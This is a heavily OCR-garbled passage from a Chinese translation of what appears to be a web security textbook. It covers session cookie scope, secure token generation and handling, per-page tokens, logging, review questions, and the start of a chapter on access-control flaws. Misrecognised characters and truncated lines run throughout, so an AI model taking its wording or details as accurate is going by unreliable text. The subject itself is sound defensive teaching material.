(1) 如 果 应 用 程序 将 cookie 汇 围 明确 放宽 到 父 域 , 则 该 应 用 程序 可 能 易于 受到 通过 其 他 Web 
应 用 程序 实施 的 攻击 。 

(2) 如 果 应 用 程序 将 它 的 cookie 范 围 设 置 为 目 己 的 域名 (或 者 并 未 指定 aomain 必 性 ), 则 通 
过 它 的 子 域 仍然 可 以 访问 其 中 的 应 用 程序 或 功能 。 

确定 将 收 到 应 用 程序 发 布 的 cookie 的 所 有 可 能 的 域名 。 如 果 通 过 这 些 域名 可 以 访问 任何 其 
他 Web 应 用 程序 或 功能 ， 确 定 是 否 可 以 利用 它们 获得 目标 应 用 程序 的 用 户 发 布 的 cookie。 




















2. cookie 路 径 限 制 

位 于 /apps/secure/foo-app/index.jsp 的 应 用 程序 建立 一 个 cookie 后 , 浏览 颖 会 默认 在 
随后 的 所 有 请 求 中 将 cookie 重 新 提交 到 路 径 /apps/secure/foo-app/ 及 任何 子 目 录 。 它 不 会 将 
cookie 提 交 到 父 目 录 或 服务 硕 上 的 其 他 任何 目录 路 径 。 

与 cookie 范 围 域 限制 一 样 ， 服 务 天 可 以 在 Set-cookie 指 令 中 搬入 一 个 path 必 性， 改变 这 种 
默认 行为 。 例 如 ， 如 果 应 用 程序 返回 以 下 HTTP 消 息 头 : 

Set-cookie: sessionId=187ab023e09c00a881a; path=/apps/; 
那么 浏览 硕 会 将 这 个 cookie 重 新 返回 到 /apps/ 路 径 的 所 有 子 目 录 中 。 

相 比 于 基于 域 的 cookie 范 围 ， 这 种 基于 路 径 的 限制 比 同 源 集 略 更 加 严格 。 因 此 ， 如 采 将 其 作 
为 一 种 安全 机 制 ， 用 于 防范 同一 域 中 的 不 可 信 应 用 程序 , 则 这 种 防御 机 制 几乎 完全 无 效 。 在 某 个 
路 径 上 运行 的 客户 问 代 人 码 能 够 打开 指 问 同一 域 上 不 同 路 径 的 窗口 或 ifframe， 并 能 够 读 取 或 号 入 该 
窗口 ， 而 不 受 任何 限制 。 因 此 ， 获 取 范 于 为 同一 域 上 的 其 他 路 径 的 cookie 实 际 上 并 不 困难 。 有 关 
更 多 详情 ， 请 参阅 以 下 Amit Klein 撰写 的 论文 : 

http://lists.webappsec.org/pipermail/websecurity lists.webappsec.org/2006-March/000843.html 


7.4 保障 会 话 管理 的 安全 


鉴于 会 话 管理 机 制 主要 受 两 类 漏洞 的 影响 ，Web 应 用 程序 必须 采取 相应 的 防御 措施 ， 防 止 这 
些 机 制 受到 攻击 。 为 安全 地 执行 会 话 管理 , 应 用 程序 必须 以 可 靠 的 方式 生成 令 牌 ,并 且 必 须 在 令 
牌 生成 到 废止 的 整个 生命 周期 中 确保 它们 的 安全 。 
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7.4.1 生成 强大 的 令 牌 


用 于 在 连续 请 求 中 重新 标识 用 户 吴 份 的 令 牌 , 在 其 生成 过 程 中 , 不 应 给 攻击 者 提供 任何 机 会 ， 
使 其 能 够 以 稼 规 方式 预测 或 推 呆 发 布 给 其 他 用 户 的 令 牌 ,从 而 从 应 用 程序 中 获得 大 量 的 令 牌 样本 。 

最 有 效 的 令 牌 生成 机 制 应 当 具 备 以 下 两 点 : 

口 使 用 数量 极其 庞大 的 一 组 可 能 值 ; 

口 包含 强大 的 伪 随 机 源 ， 确 保 令 牌 以 无 法 预测 的 方式 平均 分 布 在 可 能 信和 范围 内 。 

从 理论 上 讲 ， 只 要 拥有 足够 的 时 间 和 资源 ,任何 数据 , 无论 其 长 度 和 复杂 程度 如 何 ， 都 可 以 
使 用 蛮 力 猜测 出 来 。 设 计 强 大 的 令 牌 生成 机 制 的 目的 在 于 : 即使 蓄意 破坏 的 攻击 者 拥有 大 量 豆 宽 
和 处 理 资 源 ， 他 也 绝 无 可 能 在 令 牌 的 有 效 期 限 内 ， 成 功 猜测 出 任何 一 个 有 效 的 令 牌 。 

除 服务 需 用 来 定位 处 理 用 户 请 求 的 相关 会 话 对 象 的 一 个 标识 符 外 , 令 牌 中 不 应 包含 其 他 任何 
内 容 。 无 论 是 公开 显示 还 是 隐藏 在 几 层 编 但 或 模糊 处 理 中 , 令 牌 都 不 应 含有 意义 或 采用 结构 。 所 
有 关于 会 话 所 有 者 与 状态 的 数据 都 应 保存 在 与 会 话 令 牌 对 应 的 服务 从 会 话 对 象 中 。 

应 谨慎 选择 随机 源 。 开 发 者 应 当 认 识 到 ， 各 种 可 用 的 随机 源 在 强度 上 可 能 存在 巨大 的 差异 。 
和 java.util.Random 一 样 , 一 些 随 机 源 非常 适用 于 各 种 需要 不 断 变化 的 输入 源 的 情况 , 但 只 需 
根据 唯一 一 个 输出 项 就 可 以 准确 地 推断 出 它 的 前 后 随机 数 。 开 发 者 应 研究 不 同 的 可 用 随机 源 实际 
使 用 算法 的 数学 特性 ， 并 阅读 相关 文档 资料 ， 了 人 解 API 的 推荐 用 法 。 一 般 来 说 ， 如 果 某 种 算法 没 
有 明确 说 明 它 具有 加 密 安全 性 ， 那 么 应 认为 它 可 被 预测 。 





















































注解 ”由 于 一 些 高 强度 的 随机 源 必须 采取 步 怠 获得 足够 的 焙 ( 如 从 系统 事件 中 等 )， 
它们 需要 一 段 时 间 才 能 返回 输入 序列 中 的 下 一 个 值 ， 因 此 可 能 无 法 为 一 些 大 容量 的 应 


用 程序 迅速 建立 随机 数 以 生成 令 牌 。 








除 选择 最 为 稳定 可 靠 的 随机 源 外 ,以 与 为 其 生成 令 牌 请 求 有 关 的 一 些 信息 作为 炉 源 , 也 是 一 
种 良好 的 做 法 。 这 些 信 息 可 能 并 不 是 那个 请 求 独 有 的 , 但 却 能 够 非常 有 效 地 消除 所 使 用 的 核心 伪 
随机 数 发 生 需 存在 的 任何 缺陷 。 可 被 合并 的 信息 包括 : 

口 来 源 IP 地 址 (source IP address ) 及 接收 请 求 的 端口 号 ; 

加 请 求 中 的 User-Agent 消 息 头 ; 

口 请 求 时 间 〈 有 至 秒 )。 

合并 这 个 焙 的 最 有 效 公 式 是 建立 一 个 特殊 的 字符 串 ， 连接 一 个 伪 随 机 数 、 一 串 上 面 列 出 的 与 
请 求 有 关 的 数据 以 及 一 个 仅 服务 需 知 道 并 在 每 次 重启 时 重新 生成 的 机 密 字 符 串 。 然 后 , 使 用 适当 
的 散 列 算法 〈 例 如 ， 使 用 SHA-256 算 法 ) 对 这 个 字符 串 进行 处 理 ， 生 成 一 个 固定 长 度 、 便 于 管理 
的 字符 串 ， 并 以 它 作为 令 牌 。( 将 最 容易 发 生变 化 的 数据 项 放 在 散 列 输入 的 开始 部 分 有 助 于 最 大 
化 散 列 算法 中 的 “雪崩 ”效应 ) 




















Q( 雪崩 效 应 ， 加 密 算法 的 一 种 特征 ， 指 明文 或 密 钥 的 少量 变化 会 引起 密 文 的 很 大 变化 。 一 一 译 者 注 
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提示 决定 生成 会 话 令 牌 的 算法 后 ,一 个 有 用 的 “思想 试验 ”是 想象 伪 随 机 源 被 完全 
¥Y 攻破 ， 并 总 是 返回 相同 的 随机 数 。 如 果 出 现 这 种 情况 ， 那 么 从 应 用 程序 中 获得 大 量 令 
牌 样本 的 攻击 者 能 够 截获 发 布 给 其 他 用 户 的 令 牌 吗 ? 使 用 上 面 描述 的 公式 ， 即 使 攻击 


者 完全 了 解 生成 令 牌 所 使 用 的 算法 ,一般 也 绝 无 这 种 可 能 。 来 源 P、 端 口号 、 
User-Agent 消 息 头 和 请 求 时 间 共 同 生 成 一 个 数目 庞大 的 录 。 即 使 学 握 所 有 这 些 信 息 ， 
如 果 不 知道 服务 器 使 用 的 机 密 字 符 串 ， 攻 击 者 仍然 无 法 生成 对 应 的 令 牌 。 





7.4.2 ”在 整个 生命 周期 保障 令 牌 的 安全 


建立 一 个 无 法 预测 值 的 安全 令 牌 后 , 就 必须 在 这 个 令 牌 生成 到 废止 的 整个 生命 周期 中 保障 它 
的 安全 ， 确 保 不 会 将 其 泄露 给 除 令 脾 用 户 以 外 的 其 他 任何 人 。 

口 令 牌 只 能 通过 HTTPS 传 送 。 任 何以 明文 形式 传送 的 令 牌 部 应 视 为 被 “污染 ”， 也 就 是 说 ， 
不 能 确保 用 户 身 份 不 被 泄露 。 如 果 使 用 HTTP cookie 传 送 令 牌 , 应 将 这 些 cookie 标 记 为 安全 ， 
以 防止 用 户 浏 览 需 通过 HTTP 传 送 它们 。 如 采 可 能 ， 应 对 每 个 应 用 程序 页 面 使 用 HTTPS ， 
包括 静态 内 容 〈 如 帮助 页 面 、 图 像 等 ) 如 采 没 有 可 能 ， 并 且 仍 然 采 用 HTTP 服 务 ， 那 么 应 
用 程序 应 将 任何 访问 敏感 内 容 ( 包括 登录 页 面 ) 的 请 求 重 定 回 到 HTTPS 服 务 。 帮 助 页 面 之 
类 的 静态 资源 一 般 不 属于 敏感 内 容 ， 不 需要 使 用 通过 验证 的 会 话 即 可 访问 ; 因此 ， 可 以 通 
过 使 用 cookie 范 围 指 令 强化 cookie 的 使 用 安全 ， 防 止 在 访问 这 些 资 源 的 请 求 中 提交 令 牌 。 

口 绝 不 能 在 URL 中 传送 会 话 令 牌 ， 因 为 这 样 做 多 于 受到 会 话 固定 攻击 ， 并 可 能 使 令 牌 出 现在 
各 种 日 志 机 制 中 。 有 时 候 , 开发 者 在 禁用 cookie 的 浏览 需 中 使 用 这 种 技巧 执行 会 话 。 然 而 ， 
最 好 是 对 所 有 导航 使 用 PosT 请 求实 现 这 一 目的 ， 并 将 令 牌 保存 在 HTML 表 单 隐藏 字段 中 。 

口 应 总 是 执行 退出 功能 。 通 过 它 删除 服务 硕 上 的 所 有 会 话 资 源 并 终止 会 话 令 牌 。 

口 会 话 处 于 非 活 动 状态 一 段 时 间 ( 如 10 分 钟 ) 后 ， 应 执行 会 话 终 止 。 会 话 终 止 的 效果 应 和 
用 户 完 全 退出 的 作用 完全 相同 。 

口 应 防止 并 行 登录 。 每 次 一 名 用 户 登 录 ， 都 应 发 布 一 个 新 会 话 令 牌 ， 同 时 废止 任何 属于 该 
用 户 的 现 有 会 话 ， 就 好 像 他 已 经 退出 应 用 程序 一 样 。 如 果 旧 令 牌 被 保存 一 段 时 间 ， 那 么 
随后 收 到 任何 使 用 该 令 牌 提出 的 请 求 ， 都 应 回 用 户 发 出 安全 警报 ， 告 诉 他 们 会 话 已 被 终 
止 ， 因 为 他 已 经 从 其 他 位 置 登录 。 

口 如 果 应 用 程序 包含 任何 可 以 查看 会 话 令 牌 的 管理 或 诊断 功能 ， 应 对 这 种 功能 加 以 严密 保 
护 ， 以 防止 未 授权 的 访问 。 许 多 时 候 ， 这 种 功能 根本 没有 必要 显示 会 话 令 脾 ， 相 反 ， 它 
应 提供 足够 的 与 会 话 所 有 者 有 关 的 信息 ， 以 便于 执行 任何 文 持 和 诊断 任务 。 这 样 做 就 不 
会 泄露 该 用 户 提交 的 会 话 令 牌 ， 使 攻击 者 劫持 他 的 会 话 。 

口 应 尽 可 能 限定 应 用 程序 会 话 cookie 的 域 和 路 径 范 围 。 范 于 过 于 宽泛 的 cookie 通 各 是 由 配置 
不 佳 的 Web 应 用 程序 平台 或 Web 服 务 需 生成 的 ， 而 不 是 由 应 用 程序 开发 者 本 人 生成 的 。 通 
过 应 用 程序 cookie 范 围 中 的 域名 或 URL 路 径 ， 应 无 法 访问 其 他 Web 应 用 程序 或 不 可 信 的 功 
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能 。 应 特别 注意 用 于 访问 应 用 程序 域名 的 任何 现 有 子 域 。 有 时 ， 为 了 确保 不 会 造成 这 种 
le nh i 

应 采取 特殊 措施 保护 会 话 管理 机 制 的 安全 ， 防 止 应 用 程序 用 户 成 为 各 种 攻击 的 目标 。 

口 应 严格 审查 应 用 程序 的 代码 库 ， 以 确定 并 删除 任何 跨 站 点 脚本 漏洞 ( 请 参阅 第 12 蔓 了 解 
相关 内 容 )。 许 多 这 类 漏洞 可 被 用 于 攻击 会 话 管理 机 制 ， 特 别 是 保存 型 ( 或 二 阶 ) XSS 攻 
ee 话 滥 用 与 劫持 防御 造成 破坏 。 

不 应 接受 用 户 提 交 、 但 服务 器 并 不 认可 的 任意 令 牌 。 应 立即 在 浏览 器 中 取消 该 令 牌 ， 并 
an 

D 在 执行 转帐 之 类 的 重要 操作 之 前 ， 要 求 进 行 两 步 确认 或 重新 验证 可 有 效 防御 跨 站 点 请 求 
伪造 和 其 他 会 话 攻击 。 

口 不 完全 依赖 HTTP cookie 传送 会 话 令 牌 可 防御 跨 站 点 请 求 伪造 攻击 。 使 用 cookie 机 制 会 
成 这 种 漏洞 是 因为 ,无论 什么 原因 提出 请 求 ， 浏 览 希 都 会 目 动 提交 cookie。 如 果 总 是 通过 
HTML 表 单 隐 藏 字段 传送 令 牌 , 那么 除非 攻击 者 已 经 知道 令 牌 , 否则 他 就 无 法 建立 一 个 表 
单 ， 再 通过 提交 该 表单 执行 未 授权 操作 ; 当然 ， 如 采 他 已 经 知道 令 脾 ， 就 可 以 轻 兄 实施 
劫持 攻击 。 每 页 面 令 牌 也 有 助 于 防止 这 些 攻击 〈 请 参阅 下 一 节 了 解 相关 内 容 )。 

口 成 功 验证 后 应 总 是 建立 一 个 新 的 会 话 ， 以 避免 会 话 固定 攻击 的 影响 。 如 果 应 用 程序 并 不 
ea 
种 可 能 的 解决 办 法 是 使 提交 敏感 数据 的 页 面 序列 尺 可 能 短 ， 并 且 在 这 个 序列 的 第 一 个 页 
面 建立 一 个 新 的 会 话 ( 如 有 必要 ,从 现 有 会 on 
或 者 使 用 每 页 面 令 牌 (参阅 下 一 节 ) 防止 知道 第 一 个 页 面 所 使 用 的 令 牌 的 攻击 者 访问 随 
es 否则 不 得 问 用 户 显 示 个 人 数据 。 即 使 有 必要 ( 如 显示 地 址 

和 “确认 订单 ”页 面 )， 也 不 得 问 用 户 显 示 信 用 卡号 友和 密码 之 类 的 敏感 数据 ， 并 且 应 在 
le 

每 页 面 令 牌 

应 在 会 话 令 牌 的 基础 上 使 用 每 页 面 令 牌 ,对 会 话 实施 更 加 严格 的 控制 , 更 有 效 地 防御 或 阻 断 

各 种 会 话 攻击 。 使 用 每 页 面 令 牌 时 ， 每 次 用 户 请 求 一 个 应 用 程序 页 面 ( 例如， 不 是 图 像 )， 应 用 
程序 都 会 建立 一 个 新 的 页 面 令 牌 ， 并 通过 cookie 或 HTML 表 单 隐藏 字段 将 其 传送 给 客户 端 。 用 户 
每 次 提出 一 个 请 求 , 除 通 过 主 会 话 令 牌 进行 正常 确认 外 , 页 面 令 牌 还 根据 最 后 发 布 的 令 牌 值 进行 
再 次 检验 。 如 果 出 现 不 匹配 的 情况 ， 整 个 会 话 将 被 终止 。 因 特 网 上 的 许多 安全 性 至 关 重 要 的 应 用 
程序 ( 如 电子 银行 )， 都 使 用 每 页 面 令 牌 来 强化 对 会 话 令 牌 机 制 的 保护 ， 如 网 7-12 所 示 。 

虽然 使 用 每 页 面 令 牌 确实 给 导航 造成 一 些 限制 (例如, 使用“ 后退 ”和 “前 进 ” 按 钮 以 及 多 

窗口 浏览 方面 )， 但 它 能 够 有 效 防御 会 话 固定 攻击 ， 并 确保 如 果 合 法 用 户 和 攻击 者 同时 使 用 一 个 
被 动 持 的 会 话 提 出 相同 的 请 求 , 该 请 求 会 立即 被 应 用 程序 终止 。 每 页 面 令 牌 还 可 用 于 追踪 用 户 的 
位 置 和 在 应 用 程序 中 的 活动 情况 , 检测 出 不 按 预 定 顺 序 访 问 某 些 功能 的 企图 , 并 有 助 于 防止 某 些 
访问 控制 缺陷 〈 请 参阅 第 8 章 了 解 相 关内 容 )。 
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图 7-12 ”银行 应 用 程序 使 用 的 每 页 面 令 牌 


7.4.3 日志、 监控 与 警报 
应 用 程序 的 会 话 管理 功能 应 与 它 的 日 志 、 监 控 与 老 报 机 制 案 密 结合 ,以 提供 适当 的 反常 行为 
记录 ， 并 玫 助 管理 员 在 必要 时 采取 防御 措施 。 
口 应 用 程序 应 监控 包含 无 效 令 牌 的 请 求 。 除 非 令 牌 很 容易 被 预测 ， 否 则 ， 攻 击 者 就 需要 提 
出 大 量 包含 无 效 令 牌 的 请 求 ， 才 能 成 功 猜测 出 应 用 程序 发 布 给 其 他 用 户 的 令 牌 ， 从 而 在 
应 用 程序 的 日 志 中 留 下 明显 的 狗 迹 。 
口 很 难 完全 阻止 针对 会 话 令 脾 的 蛋 力 攻击 ， 因 为 我 们 无 法 通过 禁用 特殊 用 户 账 户 或 会 话 来 
终止 这 种 攻击 ,一 种 可 能 的 防御 方法 是 在 收 到 大 量 包含 无 效 令 牌 的 请 求 时 将 其 来 源 IP 地 址 
屏蔽 一 段 时 间 。 然 而 ， 如 果 一 个 用 户 的 请 求 来 日 几 个 IP 地 址 ( 如 AOL 用 户 ), 或 者 几 个 用 
户 的 请 求 来 自 同 一 个 下地 址 〈 如 执行 网 络 地 址 转换 的 代理 服务 器 或 防火 墙 中 的 用 户 )， 这 
种 方法 就 不 能 发 挥 太 大 的 作用 。 
口 即使 无 法 立即 有 效 防 止 针对 会 话 的 亦 力 攻击 ， 但 保留 详细 的 日 志 并 回 管 理 员 发 出 警报 仍 
然 可 玫 助 他 们 对 攻击 进行 调查 ， 并 尽 其 所 能 采取 适当 的 行动 。 
口 只 要 有 可 能 , 应 癌 用 户 殴 告 与 会 话 有 关 的 有 反 第 事件 , 例如 并 行 登录 或 明显 的 支持 攻击 (使 
用 每 页 面 令 牌 检测 )。 即 使 用 户 的 令 牌 已 被 攻破 ， 这 样 做 也 可 促使 用 户 进行 检查 ， 看 是 否 
发 生 转账 之 类 的 未 授权 操作 。 
有 反应 性 会 话 终 止 
会 话 管理 机 制 可 非 第 有 效 地 防御 许多 针对 应 用 程序 的 其 他 攻击 。 如果 收 到 用 户 提 交 的 反常 请 
求 ( 例如 , 任何 包含 被 修改 的 隐藏 HTML 表单 字段 或 URL 查 询 字 符 串 参数 的 请 求 、 任 何 包含 与 SQL 
注入 或 路 站 点 脚本 攻击 有 关 的 字符 串 请 求 , 以 及 任何 正 稼 情况 下 已 经 被 长 度 限制 之 类 的 客户 端 检 
查 阻止 的 用 户 输入 )， 那 么 一 些 安全 性 至 天 重要 的 应 用 程序 《如 电子 银行 ) 会 极其 迅速 地 终止 用 
户 的 会 话 。 
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当然 ,任何 使 用 这 类 请 求 可 对 其 加 以 利用 的 漏洞 都 必须 从 源头 进行 清除 。 但 是 , 迫使 用 户 
次 提交 一 个 无 效 请 求 时 必需 要 进行 重新 验证 , 这 会 显 考 延 长 探查 应 用 程序 漏洞 所 需 的 时 间 ， 即 使 
采用 目 动 技巧 完成 这 一 任务 也 是 如 此 。 如 果 残 余 的 漏洞 确实 存在 ， 其 他 人 就 更 不 可 能 发 现 它们 。 

如 于 执行 这 种 防御 ， 为 方便 测试 ,建议 在 需要 时 可 轻易 将 其 关 财 。 如 采 在 对 应 用 程序 进行 合 
法 渗透 测试 时 , 这 种 防御 就 像 是 遇 到 真正 的 攻击 者 那样 减 绥 应 用 程序 的 咽 应 速度 , 那么 它 的 效率 
束 会 显著 降低 。 与 不 使 用 这 种 机 制 相 比 ， 使 用 它 很 可 能 会 在 代码 中 造成 更 多 的 漏洞 。 





























渗透 测试 步 又 


如 果 所 攻击 的 应 用 程序 使 用 这 种 防御 机 制 , 渗透 测试 员 可 能 发 现在 应 用 程序 中 探查 各 种 稼 




















见 的 漏洞 非常 费时 , 每 次 测试 失败 后 都 需要 再 次 登录 并 重新 导航 到 正在 分 析 的 位 置 , 因此 不 久 
后 就 会 主动 放 径 攻击 。 

这 种 烦恼 可 以 使 用 目 动 工具 来 解除 。 当 使 用 Burp Intruder 发 动 攻击 时 ， 可 以 使 用 “获取 
cookie”( Obtain Cookie ) 特性 在 每 次 测试 前 重新 登录 ,， 并 使 用 新 的 会 话 令 牌 ( 只 要 应 用 程序 采 
用 单 阶 段 登录 机 制 )。 当 手动 浏览 和 探查 应 用 程序 时 ， 可 以 通过 IBurpExtender 接 口 使 用 Burp 
Proxy 的 扩展 性 特性 。 渗 透 测试 员 可 以 建立 一 个 扩展 ， 检 测 应 用 程序 何 时 执行 强制 退出 、 上 自动 
登录 到 应 用 程序 并 将 新 会 话 和 页 面 返 回 给 浏览 旨 ， 同 时 选择 使 用 弹出 消息 通知 所 发 生 的 一 切 。 
虽然 使 用 这 种 方法 并 不 能 完全 解决 这 个 问题 ， 但 在 某 些 情况 下 能 显 着 减轻 它 造成 的 影响 。 






































7.5 ”小结 


攻击 者 在 攻击 应 用 程序 时 ,会话 管 理 机 制 中 存在 的 诸多 源 洞 为 他 们 提供 了 大 量 的 攻击 目标 。 
鉴于 其 在 多 个 请 求 中 确定 相同 用 户 映 份 过 程 中 所 发 挥 的 重要 作用 , 不 完善 的 会 话 管 理 功能 通 弟 会 
成 为 攻击 者 “进入 应 用 程序 王国 的 钥 古 ”。 对 攻击 者 来 说 ， 进 入 其 他 用 户 的 会 话 当然 不 错 ， 但 动 
持 管理 员 的 会 话 会 更 好 ， 因 为 这 样 他 往往 能 够 攻破 整个 应 用 程序 。 

现实 世界 的 会 话 管理 功能 中 往往 存在 各 种 各 样 的 缺陷 。 当 应 用 程序 采用 定制 机 制 时 ,其 中 可 
能 会 存在 各 种 薄弱 环 方 , 并 有 无 数 种 攻击 方法 可 供 攻 击 者 利用 。 耐心 与 坚持 不 懈 是 我 们 从 中 汲取 
到 的 最 重要 的 教训 。 许 多 会 话 管理 机 制 初 看 起 来 似乎 安全 可 菲 , 但 仔细 分 析 后 却 发 现 它 们 并 不 合 
格 。 解 详 应 用 程序 如 何 生 成 看 似 随机 的 令 牧 序列 ， 这 个 过 程 既 费 时 又 费力 。 但 由 于 这 样 做 通常 可 
医 得 巨大 的 回报 ， 因 而 值得 为 之 花费 时 间 和 精力 。 









































7.6 问题 


欲 知 问 题 答案 ， 请 访问 http:/mdsec.netwahh 。 
(1) 登录 一 个 应 用 程序 后 ， 服 务 融 建立 以 下 cookie: 


Set-cookie: sessid=aml tM]JM6E6MTIOMToxMTkKOODCWODYZ:; 
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一 个 小 时 后 ， 再 次 登录 并 得 到 以 下 cookie: 

Set-cookie: sessid=amLtMjM6MTI0MToxMTk0ODc1MTMY; 

通过 这 些 cookie， 可 以 得 出 什么 推论 ? 

(2) 某 个 应 用 程序 使 用 由 6 个 字符 组 成 的 数字 字母 会 话 令 牌 和 由 5 个 字符 组 成 的 数字 字母 密 
但 。 它们 全 都 由 某 种 无 法 预测 的 算法 随机 生成 。 其 中 哪 一 个 最 有 可 能 成 为 蛋 力 猜测 攻击 的 目标 ? 
列 出 影响 你 做 出 决策 的 各 种 不 同 因 系 。 

(3) 登录 位 于 以 下 URL 的 一 个 应 用 程序 : 


https://foo.wahh-app.com/login/home.pPhp 


服务 右 建 六 PD 下 cookie: 


Set-cookie: sessionId=1498172056438227; domain=foo .wahh-— 
app.com; path=/login; HttpOnily:; 


然后 访问 下 面 的 URL。 浏 览 器 会 将 sessionId cookie 提 交 给 哪些 URL? ( 选 出 全 部 答案 。) 
(a) https://foo.wahh-app.com/login/myaccount.php 
(b) https://bar.wahh-app.com/logmn 
(c) https://staging.foo.wahh-app.com/login/home.php 











(d) http://foo.wahh-app.com/logimn/myaccount.php 
(e) http://foo.wahh-app.com/logintest/login.php 
(f) https://foo.wahh-app.com/logout 
(g) https://wahh-app.com/login/ 
(h) https://xfoo.wahh-app.com/logimn/myaccount.php 
(4) 所 针对 的 应 用 程序 除 使 用 主 会 话 令 牌 外 ， 还 使 用 每 页 面 令 牌 。 如 果 收 到 一 个 不 按 顺 序 发 
送 的 每 页 面 令 牌 ， 整 个 会 话 将 被 终止 。 假 设 发 现 了 有 某 种 缺陷 , 可 通过 它 预 测 或 截获 应 用 程序 发 布 
给 当前 正在 访问 应 用 程序 的 其 他 用 户 的 令 牌 。 那 么 能 够 劫持 他 们 的 会 话 吗 ? 
(5) 登录 一 个 应 用 程序 后 ， 服 务 需 建立 以 下 cookie: 
Set-cookie: sess=abl1298f7eg14; 
单 击 “ 退 出 ”按钮 后 ， 应 用 程序 执行 以 下 客户 闹 脚 本 : 


document .cookie="sess="} 




















document. location="/":; 


通过 这 种 行为 ， 可 以 得 出 什么 结论 ? 





攻击 访问 控制 


人 逻辑 上 讲 ， 应 用 程序 核心 安全 机 制 的 访问 控制 建立 在 验证 和 会 话 管理 之 上 。 到 现在 为 
止 ， 我们 已 经 了解 了 应 用 程序 如 何 首 先 核实 用 户 的 号 份 ， 然 后 确认 它 收 到 的 菏 个 特殊 
的 请 求 序列 由 该 用 户 提出 。 应 用 程序 之 所 以 需要 这 样 做 , 至 少 从 安全 上 讲 , 是 因为 它 必须 决定 是 
人 耕 允 许 某 个 请 求 执行 特定 的 操作 或 访问 它 请 求 的 资源 。 访 问 控 制 是 应 用 程序 的 一 个 重要 防御 机 
制 ， 因 为 它们 负责 做 出 这 些 关 键 决定 。 如 来 访问 控制 存在 缺陷 ,攻击 者 往往 能 够 攻破 整个 应 用 程 
序 ， 控 制 其 管理 功能 并 访问 属于 其 他 用 户 的 敏感 数据 。 

如 第 1 章 所 述 , 不 完善 的 访问 控制 中 最 常见 的 Web 应 用 程序 漏洞 , 影响 了 我 们 最 近 测试 的 71% 
的 应 用 程序 。 我 们 发 现 应 用 程序 做 出 一 切 努 力 执行 稳定 的 验证 与 会 话 管理 机 制 , 但 由 于 没有 在 它 
们 上 面 建立 任何 有 效 的 访问 控制 , 因而 浪费 了 这 方面 的 投资 , 这 种 情况 非 第 第 见 。 这 些 漏 洞 如 此 
普 衣 的 一 个 原因 在 于 , 需要 对 每 一 个 请 求 ,以 及 特殊 用 户 在 特定 时 刻 答 试 对 资源 执行 的 每 一 项 操 
作 执 行 访问 控制 检查 。 而 且 ， 与 许多 其 他 类 型 的 控制 不 同 , 这 一 设计 决策 需要 由 人 做 出 ， 而 无 法 
采用 技术 来 解决 。 

访问 控制 漏洞 的 概念 非 稼 简单: 应 用 程序 允许 攻击 者 执行 采种 攻击 者 没有 资格 执行 的 操作 。 
各 种 漏洞 之 间 的 差异 实际 上 可 归结 为 这 些 核 心 漏洞 表现 方式 上 的 不 同 , 以 及 检测 它们 所 需要 使 用 
的 技巧 之 间 的 差异 。 我 们 将 描述 所 有 这 些 技 巧 , 讨论 如 何 利 用 应 用 程序 的 各 种 不 同行 为 , 执行 未 
授权 操作 并 访问 受 保护 的 数据 。 


8.1 吊 见 漏洞 


访问 控制 可 分 为 三 大 类 : 垂直 访问 控制 、 水 平 访问 控制 和 上 下 文 相关 的 访问 控制 。 

午 直 访问 控制 允许 各 种 类 型 的 用 户 访问 应 用 程序 的 不 同 功 能 。 在 最 简单 的 情况 下 ,应 用 程序 
通过 这 种 控制 界定 普通 用 户 和 管理 员 。 在 更 加 复杂 的 情况 下 , 垂下 访问 控制 可 能 第 要 界定 允许 其 
访问 特殊 功能 的 各 种 不 同类 型 的 用 户 ， 给 每 个 用 户 分 配 一 个 单独 的 角色 ， 或 一 组 不 同 的 角色 。 

水 平 访问 控制 多 许 用 户 访问 一 组 相同 类 型 的 、 内 容 极 其 广泛 的 资源 。 例 如 ，Web 邮 件 应 用 程 
序 人 允许 访问 目 己 而 非 他 人 的 电子 邮件 ; 电子 银行 只 允许 转移 日 己 账户 内 的 资金 ; 工作 流程 应 用 程 
序 允 许 更 新 分 配给 你 的 任务 ， 但 上 只 能 阅读 分 配给 他 人 的 任务 。 

上 下 文 相关 的 访问 控制 可 确保 基于 应 用 程序 当前 的 状态 ， 将 用 户 访问 仅 限于 所 允许 的 内 容 。 
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例如 ， 如 果 在 菏 个 过 程 中 , 用 户 需要 完成 多 个 阶段 的 操作 ， 上 下 文 相关 的 访问 控制 可 以 防止 用 户 
不 按 规定 的 顺序 访问 这 些 阶段 。 

许多 时 候 , 垂直 与 水 平 访问 控制 相互 交付。 例如 ,企业 资源 规划 应 用 程序 允许 每 个 应 付 账 会 
计 文 员 文 付 某 一 个 组 织 单元 、 而 非 其 他 单元 的 发 票 ,但 允许 应 付 账 经 理 文 付 任何 单元 的 发 票 。 同 
样 ， 会 计 文员 只 能 文 付 小 额 发 票 ， 而 大 额 文 票 必须 由 经 理 文 付 。 财 务 总 监 可 以 查看 公司 每 个 组 织 
单元 的 发 票 文 付 和 收据 ， 但 不 得 文 付 任何 发 票 。 

如 果 用 户 能 够 访问 他 无 权 访问 的 功能 或 资源 ， 就 表示 访问 控制 存在 缺陷 。 主 要 有 三 种 类 型 的 

以 访问 控制 为 目标 的 攻击 ， 分别 与 三 种 访问 控制 相对 应 。 
口 如 末 一 名 用 户 能 够 执行 某 项 功能 ， 但 分 配给 他 的 角色 并 不 具有 这 种 权限 ， 就 表示 出 现 垂 
直 权 限 提升 源 润 。 例 如 ， 如 琳 一 名 普通 用 户 能 够 执行 管理 功能 ， 或 者 一 位 会 计 文员 能 够 
支付 任何 金额 的 发 票 ， 就 表示 访问 控制 并 不 完善 。 
口 如 采 一 名 用 户 能 够 查看 或 修改 他 没有 资格 查看 或 修改 的 人 资源， 就 表示 出 现 水 平权 限 提升 
漏洞 。 例 如 ， 如 采用 户 能 使 用 Web 邮 件 应 用 程序 阅读 他 人 的 电子 邮件 ， 或 者 如 果 一 位 会 计 
文员 可 以 处 理 上 自己 所 属 组 织 单 元 以 外 的 单元 的 发 票 ， 那 么 访问 控制 也 不 完善 。 
口 如 采用 户 可 以 利用 应 用 程序 状态 机 中 的 痢 洞 获得 关键 资源 的 访问 权限 ， 就 表示 出 现 业 务 
逻辑 漏洞 。 例 如 ， 用 户 能 够 避 开 购物 结算 序列 中 的 文 付 步 又。 
许多 时 候 ， 应 用 程序 水 平权 限 划分 中 存在 的 漏洞 可 能 会 立即 引起 垂 生 权限 提升 攻击 。 例 如 ， 
如 果 一 名 用 户 能 够 以 某 种 方式 设置 其 他 用 户 的 密码 , 那么 该 用 户 就 能 攻击 管理 员 的 账户 并 控制 整 
个 应 用 程序 。 
